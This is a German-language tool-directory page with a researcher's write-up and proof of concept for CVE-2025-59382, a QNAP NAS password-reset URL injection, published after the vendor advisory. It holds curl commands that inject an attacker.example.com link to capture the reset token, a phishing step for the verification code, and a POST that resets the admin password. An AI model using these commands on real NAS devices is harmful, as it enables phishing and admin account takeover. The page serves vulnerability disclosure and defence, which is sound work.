Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-59382-QNAP-Password-Reset-Account-Takeover — Proof-of-Concept und technische Ausarbeitung zu CVE-2025-59382, einer nicht authentifizierten Passwort-Reset-URL-Injection im QNAP NAS, die eine Phishing-zu-Kontoübernahme-Kette ermöglicht. | Kitploit
Tools/GitHubGitHub/rat5ak/cve-2025-59382-qnap-password-reset-account-takeover
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPhishingPenetrationstestsLernen & Bildung
GitHubrat5ak/cve-2025-59382-qnap-password-reset-account-takeover

CVE-2025-59382-QNAP-Password-Reset-Account-Takeover

Proof-of-Concept und technische Ausarbeitung zu CVE-2025-59382, einer nicht authentifizierten Passwort-Reset-URL-Injection im QNAP NAS, die eine Phishing-zu-Kontoübernahme-Kette ermöglicht.

Repository anzeigen
1116vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59382: QNAP Passwort-Reset zu Account-Übernahme

Nicht authentifizierte, vom Angreifer kontrollierte URL zum Zurücksetzen des Passworts in /cgi-bin/reset_password.cgi.

Getestet gegen QuTScloud c5.2.4.3041 Build 20250211 in einem Labor. QNAP veröffentlichte dies später als CVE-2025-59382 in der Sicherheitsmeldung QSA-26-10.

Kurzfassung

Ein nicht authentifizierter Angreifer mit lokalem Netzwerkzugriff oder Zugriff auf eine freigelegte NAS-Verwaltungsoberfläche kann eine beliebige URL in die offizielle QNAP-Passwort-Reset-E-Mail einschleusen, indem er den Parameter url der Funktion send_mail in /cgi-bin/reset_password.cgi manipuliert.

Das Opfer erhält eine echte QNAP-Passwort-Reset-E-Mail vom NAS. Die Angreifer-URL wird direkt in den HTML-E-Mail-Text eingebettet, und QNAP hängt das Reset-Token (rp) an diese URL an.

Dies verwandelt die Passwort-Reset-E-Mail in eine saubere Phishing-zu-Account-Übernahme-Kette:

  1. Angreifer löst Passwort-Reset mit eigener URL aus
  2. NAS sendet die echte QNAP-Reset-E-Mail an das Opfer
  3. Opfer klickt auf die Angreifer-URL
  4. Angreifer erhält das rp-Reset-Token
  5. Opfer gibt den Bestätigungscode (vc) auf der Phishing-Seite ein
  6. Angreifer setzt das Admin-Passwort zurück und meldet sich an

Erfordert Interaktion des Opfers, aber keine Authentifizierung des Angreifers.

Auslöser

curl "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi?func=send_mail&user=admin&url=https://attacker.example.com/phish"

Das NAS sendet die offizielle Reset-E-Mail und hängt das Reset-Token an die Angreifer-URL an, zum Beispiel:

https://attacker.example.com/phish&u=admin&rp=e15a88a01fa81e58352b4b157607cb44

Der Bestätigungscode wird ebenfalls in derselben E-Mail angezeigt. In den Laborbeweisen sah es so aus:

Your verification code is: 2FEA2B8B

Die Phishing-Seite muss das Opfer also nur nach dem Bestätigungscode fragen. Das rp-Token landet bereits auf dem Server des Angreifers, wenn der Link geklickt wird.

Passwort-Reset

Sobald der Angreifer das rp-Token und den zugehörigen Bestätigungscode vc hat, kann er das Admin-Passwort zurücksetzen:

curl -X POST -d "func=reset_user_pw&user=admin&token=e15a88a01fa81e58352b4b157607cb44&vc=725E0F00&new_pw=UHduZWQyMDI2IQ==" \
  "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi"

Der finale Reset-Aufruf muss ein POST sein. Der Bestätigungscode, den das Opfer auf der gefälschten Seite eingibt, wird als vc=<code> an QNAP gesendet.

Das neue Passwort ist base64-kodiert in new_pw. Im PoC reichte dies aus, um das Admin-Passwort zu ändern und sich dann als Admin anzumelden.

Warum es funktioniert

Der normale Frontend-Ablauf erstellt eine lokale NAS-URL wie:

location.protocol + "//" + location.host + "/cgi-bin/main.html?cp=1"

Aber das Backend vertraut dem vom Client gelieferten Parameter url, anstatt die Reset-URL selbst zu generieren. Es erstellt dann den E-Mail-Link mit diesem Wert und hängt an:

&u=<user>&rp=<reset_token>

Es vertraut einfach allem, was als url übergeben wird.

Auswirkungen

  • nicht authentifizierter Reset-E-Mail-Auslöser
  • offizielle QNAP-E-Mail enthält vom Angreifer kontrollierte URL
  • Reset-Token gelangt an den Angreifer, wenn das Opfer klickt
  • Bestätigungscode kann aus demselben E-Mail-Ablauf ge-phisht werden
  • Laborkette bewies Admin-Passwort-Reset und Admin-Login

Die vertrauenswürdige NAS-E-Mail übernimmt die Zustellung.

Öffentlicher Status

  • CVE: CVE-2025-59382
  • Sicherheitsmeldung: QSA-26-10
  • Veröffentlichungsdatum der QNAP-Sicherheitsmeldung: 2026-06-17
  • Hersteller-CWE: CWE-472
  • Hersteller-CVSS v4.0: 5.1 Mittel
  • QNAP-Status: behoben

QNAP listet die betroffenen Produkte wie folgt auf:

  • QTS 5.2.7
  • QuTS hero h5.2.8
  • QuTS cloud c5.2.8
  • QVP 2.7.1

Korrigierte Versionen laut QNAP:

  • QTS 5.2.9.3499
  • QuTS hero h5.2.9
  • QuTS cloud C5.2.9
  • QVP 2.8.0

QNAP beschrieb das Problem als einen entfernten Angreifer, der die Passwort-Reset-URL modifiziert und ein Opfer dazu bringt, eine vom Angreifer kontrollierte Reset-Seite zu besuchen, was zum Diebstahl von Anmeldedaten führt.

Mein eigenes Laborziel war QuTScloud c5.2.4.3041 Build 20250211. Meine Laborauswirkung war Admin-Passwort-Reset und Admin-Login nach Interaktion des Opfers.

Kleine Anmerkung: Ich habe dies in meinem Labor am 2026-05-09 reproduziert und am 2026-05-11 an QNAP gesendet; sie markierten es als Duplikat von INTSI000-9029. Da QNAP nun das CVE/Advisory veröffentlicht hat, veröffentliche ich den POC. Dank an Tim Coen als den Ersten, der es gefunden hat.

Was ich beheben würde

Ich kenne den genauen Patch, den QNAP verwendet hat, nicht. Ihre Sicherheitsmeldung listet nur korrigierte Versionen.

Meine Vermutung für die richtige Korrektur ist einfach: Lassen Sie nicht zu, dass der Browser dem NAS mitteilt, wohin der Reset-Link zeigen soll.

Das NAS sollte diesen Link selbst erstellen. Wenn QNAP für den Ablauf noch einen url-Parameter benötigt, sollte es nur die normale NAS-Reset-Seite akzeptieren und alles Externe ablehnen.

Ich würde auch alles kodieren, was in den E-Mail-Text eingefügt wird, und eine Ratenbegrenzung für nicht authentifizierte Reset-E-Mail-Anfragen einrichten.

Referenzen

  • QNAP advisory: https://www.qnap.com/en/security-advisory/qsa-26-10
  • QNAP CVE JSON: https://www.qnap.com/uploads/security-advisories/QSA-26-10/CVE-2025-59382.json
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59382
  • CVE record: https://www.cve.org/CVERecord?id=CVE-2025-59382

Haftungsausschluss: Dieser Exploit-Code wird zu Bildungs- und Abwehrforschungszwecken veröffentlicht. Verwenden Sie ihn nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben. Der Autor übernimmt keine Verantwortung für Missbrauch.

Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium · nadsec.online

Tool herunterladen